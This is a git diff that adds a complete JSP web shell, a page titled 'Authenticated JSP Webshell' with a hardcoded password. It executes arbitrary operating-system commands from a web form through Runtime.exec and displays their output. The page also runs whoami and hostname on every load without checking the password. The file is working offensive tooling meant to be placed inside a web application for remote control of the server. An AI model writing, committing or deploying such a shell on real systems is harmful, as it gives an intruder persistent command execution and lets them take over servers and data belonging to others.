diff --git a/web/webshell.jsp b/web/webshell.jsp
new file mode 100644
index 0000000..df07537
--- /dev/null
+++ b/web/webshell.jsp
@@ -0,0 +1,82 @@
+<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+<%!
+	public String execute(String pass, String cmd, Boolean skip) {
+
+        // ----------------------------------------
+        // CHANGE THIS HARDCODED PASSWORD
+        //
+		final String hardcodedPass = "brhQ5U7OzHdqpnTgKaCo6Zd";
+
+		StringBuilder res = new StringBuilder();
+
+		if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(hardcodedPass) || hardcodedPass.toLowerCase().equals("none")))){
+			try {
+				Process proc = Runtime.getRuntime().exec(cmd);
+				OutputStream outs = proc.getOutputStream();
+				InputStream ins = proc.getInputStream();
+				DataInputStream datains = new DataInputStream(ins);
+				String datainsline = datains.readLine();
+
+				while ( datainsline != null) {
+					res.append(datainsline + "<br/>");
+					datainsline = datains.readLine();
+				}
+			} catch( IOException e) {
+				return "IOException: " + e.getMessage();
+			}
+		}
+		else {
+			return "Wrong password or no command issued.";
+		}
+
+		String out = res.toString();
+        if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) { 
+            out = out.substring(0, out.length() - 5);
+        }
+        out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
+        return out;
+	}
+%><!DOCTYPE html>
+<html>
+	<head>
+		<title>JSP Application</title>
+	</head>
+    <body>
+		<h3>Authenticated JSP Webshell.</h3>
+		<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
+		<br/>
+		<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
+		<br/>
+		<hr/>
+		<form method=post>
+		<table style="width:100%; font-size: 12px">
+                        <tr>
+                                <td>OS:</td><td style="width:100%">
+                                    <% out.print(System.getProperty("os.name")); %>
+                                </td>
+                        </tr>
+			<tr>
+				<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
+			</tr>
+			<tr>
+				<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
+			</tr>
+			<tr>
+				<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
+			</tr>
+		</table>
+		</form>
+		<hr />
+		<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
+			if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
+				out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
+				out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
+			}
+		%></pre>
+	
+	</body>
+</html>
+